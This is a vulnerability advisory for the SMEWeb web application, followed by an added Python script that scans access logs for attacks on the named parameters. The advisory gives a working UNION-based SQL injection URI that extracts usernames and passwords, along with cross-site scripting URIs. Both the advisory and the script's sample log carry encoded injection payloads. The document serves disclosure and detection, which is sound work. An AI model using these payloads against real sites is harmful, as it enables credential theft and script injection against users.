SMEWeb SQL Injection and Multiple Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues through a browser. To exploit the cross-site scripting issues, the attacker must entice an unsuspecting user to follow a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/catalog.php?idp=1'union select 1,2,password,username,5,6,7,8 from smeweb_user where userid=1 ORDER BY counter/*
http://www.example.com/catalog.php?data=<XSS>
http://www.example.com/search.php?keyword=<XSS>
http://www.example.com/bb.php?page=<XSS>
http://www.example.com/order.php?new_s=<XSS>
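The following is an added detection example, not part of the original advisory: it scans web-server access-log lines for the vulnerable scripts and parameters named above and flags values carrying a UNION-based SQL injection or a script-injection payload. The log lines are constructed for the example (Apache combined-log style, payloads percent-encoded as a browser would send them); `WATCHED`, `classify` and `scan` are names chosen here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (not from the advisory): one benign
# request, then requests mirroring the proof-of-concept URIs above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /catalog.php?idp=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2010:10:00:01 +0000] "GET /catalog.php?idp=1%27union%20select%201,2,password,username,5,6,7,8%20from%20smeweb_user%20where%20userid=1%20ORDER%20BY%20counter/* HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2010:10:00:02 +0000] "GET /search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 433
10.0.0.5 - - [01/Jan/2010:10:00:03 +0000] "GET /bb.php?page=%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 433
"""

# Scripts and parameters the advisory names as vulnerable.
WATCHED = {
    "/catalog.php": {"idp", "data"},
    "/search.php": {"keyword"},
    "/bb.php": {"page"},
    "/order.php": {"new_s"},
}

# A quote followed by UNION SELECT, or a trailing /* comment that truncates
# the rest of the original query, as in the catalog.php proof of concept.
SQLI = re.compile(r"'\s*union\s+(?:all\s+)?select\b|/\*\s*$", re.I)
# An HTML tag opener, an inline event handler, or a javascript: URL.
XSS = re.compile(r"<\s*/?\s*[a-z]+|\bon\w+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify(value):
    """Return 'sqli', 'xss', or None for a fully decoded parameter value."""
    if SQLI.search(value):
        return "sqli"
    if XSS.search(value):
        return "xss"
    return None

def scan(log_text):
    """Return (script, parameter, class) for each watched parameter with a payload."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name not in WATCHED.get(url.path, ()):
                continue
            # parse_qsl decoded once; decode again so a double-encoded
            # payload is inspected in clear rather than slipping past.
            kind = classify(unquote_plus(value))
            if kind:
                hits.append((url.path, name, kind))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s param %s: %s" % hit)
```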

Copyright 2010, SecurityFocus